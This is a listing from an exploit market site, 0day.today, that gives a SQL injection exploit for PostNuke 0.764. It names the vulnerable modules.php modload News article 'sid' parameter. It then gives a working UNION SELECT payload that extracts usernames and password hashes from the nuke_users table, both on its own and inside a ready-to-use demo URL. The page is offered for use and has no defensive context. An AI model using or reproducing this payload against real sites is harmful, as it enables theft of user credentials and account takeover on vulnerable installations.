[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

PostNuke 0.764 Module modload SQL Injection Vulnerability

Author
BILGE_KAGAN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-12005
Category
web applications
Date add
26-04-2010
Platform
php
=========================================================
PostNuke 0.764 Module modload SQL Injection Vulnerability
=========================================================

PostNuke 0.764 Module modload SQL Injection Vulnerability
 
########################### 
       
Author    : BILGE_KAGAN
    
Homepage  : http://www.1923turk.com  
       
Script    : postnuke http://www.postnuke.com
   
Download  : http://www.postnuke.com/module-Content-view-pid-2.html 
       
###########################   
         
[ Vulnerable File ]
   
     
modules.php?op=modload&name=News&file=article&sid=[ SQL ] 
          
     
[ XpL ]
  
       
1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--
   
[ Demo]
  
   
http://[site]/modules.php?op=modload&name=News&file=article&sid=1+and+0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat(pn_uname,0x3a,pn_pass),16,17,18,19,20,21+from+nuke_users--



#  0day.today [2024-12-24]  #